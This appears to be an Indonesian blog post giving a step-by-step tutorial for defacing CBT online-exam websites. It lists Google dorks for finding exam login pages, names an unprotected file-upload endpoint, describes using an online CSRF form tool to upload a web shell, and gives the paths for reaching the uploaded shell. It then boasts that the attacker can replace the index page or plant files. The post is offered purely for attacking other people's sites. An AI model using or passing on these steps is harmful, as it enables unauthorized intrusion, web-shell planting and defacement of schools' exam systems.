DEFACE METODE CBT
Assalamualaikum Wr Wb.
Kali Ini Saya Akan Membagikan Tutorial :
"Cara Deface Metode CBT
Bahan-Bahan :
-Dork
-Koneksi Internet
-Kopi + Udut
Langsung Saja Ke Materi.
Dork :
-inurl:/panel/pages/login.php(Use Your Brain)
-inurl:/login.php inurl:/cbt
-inurl:/login.php intitle:ujian online
-inurl:/login.php intitle:cbt beesmart
Kalo belom dapat,Lu Belum Beruntung :V
–Exploit
/panel/pages/upload-file.php
– CSRF Online(banyak di google)
1. Yang Pertama Dorking dulu dork diatas
2. Pilih targetnya,Lalu Tambahkan Exploitnya Dibelakang Pages
Contoh :
http:/www.target.com/login.php
Menjadi :
http:/www.target.com/panel/pages/upload-file.php
Kalo Targetnya "blank putih/warna putih kosong" berarti vuln.
3. Lalu kalo sudah dapat yang vuln, kita masukan link target nya ke CSRF Online,
Untuk POST FILE pilih uploadfile, atau ketik aja 'uploadfile' lalu kalo sudah klik Lock!
4. Lanjut Trus Upload Shell, Klik Aja Choose file Lalu Pilih Shell Kita Kalo Sudah Klik "upload" Kalo setelah diupload ada tulisan sukses berarti berhasil shell telah diupload
5. Trus Gimana Cara Ngakses Shellnya?
Untuk Mengakses Shellnya Tambahkan:
/images/namashell.php atau
/picture/namashell.php
dibelakang
Kalo berhasil maka akan muncul tampilan shell kalian.
wkwkw Kalau Sudah Kaya Gini
Kau Tau Sendiri Tebas Index Juga Bisa, Nitip File Juga Bisa
Dork : inurl:/panel/pages/login.php
Exploit : /panel/pages/upload-file.php
Cara akses Ganti Jadi :
/panel/pages/upload-file.php menjadi /images/NamaShell.php
Sekian Tutor Dari Admin.
Semoga Bermanfaat
Tidak ada komentar:
Posting Komentar